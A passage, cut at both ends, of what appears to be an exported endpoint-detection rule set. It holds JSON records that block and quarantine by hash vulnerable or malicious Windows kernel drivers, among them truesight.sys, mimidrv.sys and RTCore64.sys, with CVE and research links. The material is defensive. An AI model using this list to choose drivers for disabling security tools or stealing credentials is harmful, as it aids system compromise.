"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820373Z", + "creation_date": "2026-03-23T11:45:30.820375Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820380Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "6f806a9de79ac2886613c20758546f7e9597db5a20744f7dd82d310b7d6457d0", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b3c2c9a-acc6-5b21-9a5c-5b834cc9d31f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826332Z", + "creation_date": "2026-03-23T11:45:31.826335Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826340Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "689d7260ad115a4d5d45cbd44769208925a1441fe5b0d1ba15f9b14371f936e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b40c88f-711a-58ee-a80f-01194192dacb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470961Z", + "creation_date": "2026-03-23T11:45:30.470964Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470973Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "01096e6d09cad1af557561f678e70434355a4d07a94ba97774957c16e87bab6a", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b4b6ecc-05b1-584e-8db0-0e152ef00ec1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471469Z", + "creation_date": "2026-03-23T11:45:30.471472Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471482Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db73b0fa032be22405fa0b52fbfe3b30e56ac4787e620e4854c32668ae43bc33", + "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b4cb740-90d3-54ec-be83-ca9474f0faf7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457041Z", + "creation_date": "2026-03-23T11:45:30.457044Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457053Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1fe70267698ba60012ca4c2c0f21325236bafc7b42fa977a09afa6a0c5ed3784", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b72ffda-4f5b-5add-8e10-10fe0ee2f202", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823446Z", + "creation_date": "2026-03-23T11:45:31.823449Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", 
+ "hl_testing_start_time": "2026-03-23T11:45:31.823456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ed8bb1bd3663e2c641a46fd5c35c0275c5f89436abf8a83b3fbdb8eb1a534c8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b7c83d3-8d9d-52ad-9715-7f3075819438", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620388Z", + "creation_date": "2026-03-23T11:45:29.620390Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620395Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b8ab76f-337a-58e7-9b46-41b701737176", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155206Z", + "creation_date": "2026-03-23T11:45:31.155208Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155213Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d20aa6ed460e6727acaa1a81f3305c5c32626f5f973d6839461c6d7292fb185b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5b96dc37-1f27-5374-9b68-b9c6e3ab7dff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817865Z", + "creation_date": "2026-03-23T11:45:30.817868Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817890Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "419b5bca6d43650893d5e044e785c0ad87cbe1185de0d3feaa9f681c6e7f50b4", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ba26841-1043-567b-ac27-96295134e597", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144409Z", + "creation_date": "2026-03-23T11:45:32.144412Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144417Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d40f6a680914df8c6cf8dda62332ad829a91815ad94439b920af986f93939a7d", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ba68e64-64c4-5208-9efe-347c3d239566", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462849Z", + "creation_date": "2026-03-23T11:45:30.462852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462861Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60ee78a2b070c830fabb54c6bde0d095dff8fad7f72aa719758b3c41c72c2aa9", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ba6b281-326b-5f0a-b14f-b3c7ed603d33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826981Z", + "creation_date": "2026-03-23T11:45:30.826983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826988Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "544be349a5bd52275bd943bfd7d0c1f486d526c27528cb3020e23da4a905afab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] 
[file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5bb34de9-c08c-5a99-bdfa-d2af69539ef9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149789Z", + "creation_date": "2026-03-23T11:45:31.149791Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49de16e30da6d3639cb06b2cee03ce75677caf95ba9e9ca5b89e3b8cdeca5fdb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5bec0360-9605-589e-9e9b-0f957d18edab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821799Z", + "creation_date": "2026-03-23T11:45:31.821802Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821811Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46cfe42abb9263471121ecdf6f0af023b2e9dd2ab6733b2138fd0657a5fee997", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c0201d7-1a57-56d2-bb66-1b112f5842b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155119Z", + "creation_date": "2026-03-23T11:45:31.155121Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155126Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e3bfc1fc0f8b5516d82ea982269ee6075c2d28a429c3be7f3f3249c5adb96b74", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c061ae9-6588-5736-9f23-e1fb6e1a5642", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619717Z", + "creation_date": "2026-03-23T11:45:29.619718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619724Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6f8aa3de5b4aea58eddd45807d722c864d4bc4a38ad573174af864e21f0d526", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c063c73-64f8-52d4-ba75-d79251201ec2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971615Z", + "creation_date": "2026-03-23T11:45:29.971617Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971623Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a59ad5be59f73f2a138c70d8aa634bf5f3364a67e072b64ff2a6d4627514a9ad", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c14b3aa-739c-5021-b29d-964808ca84fd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143723Z", + "creation_date": "2026-03-23T11:45:32.143726Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143731Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b14ff6a1054fa4bae158111fbcaf35baeedaa9b664c8fb7241db98f7e1c6c20", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c16788d-a162-52a0-967e-f4f6e6f7770d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495585Z", + "creation_date": "2026-03-23T11:45:31.495587Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495592Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53cd5eeac12e5850c978570f42faa93731d6519da4fa747cc57c37d442ec8142", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c1eec8e-982a-5448-8752-995c2ff0a745", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481711Z", + "creation_date": "2026-03-23T11:45:31.481714Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481724Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"6e3d9ac8a8067d049d19c798dc419def9ad47db592ba515e7134664985c4b79f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c36dadb-a3ba-5ab6-9522-884c12d0eb1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607381Z", + "creation_date": "2026-03-23T11:45:29.607383Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607390Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f84f8173242b95f9f3c4fea99b5555b33f9ce37ca8188b643871d261cb081496", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c394935-7469-501a-9833-f4f84e0caa7e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831495Z", + "creation_date": "2026-03-23T11:45:30.831497Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831502Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ec99853052f83b8f7279ac0283f9721f663fa44bc64baef21f94394c3a2c36a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c477103-9716-5585-81cd-ba975fccd12c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807992Z", + "creation_date": "2026-03-23T11:45:31.807995Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808003Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19bdcbfbd05cc52a932a38e75aecd1240e3a4c74ef40fdd86a87f8bb9a96db36", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c5c6e8d-0f9f-52e0-8177-602f84e62918", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834491Z", + "creation_date": "2026-03-23T11:45:30.834494Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834503Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2274479c525939a531525c393bac08042babe6c8792cdcde8e6952bdab4dd3d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5c5f2fc6-d6ac-59ec-9c76-1fa23ac53fa1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
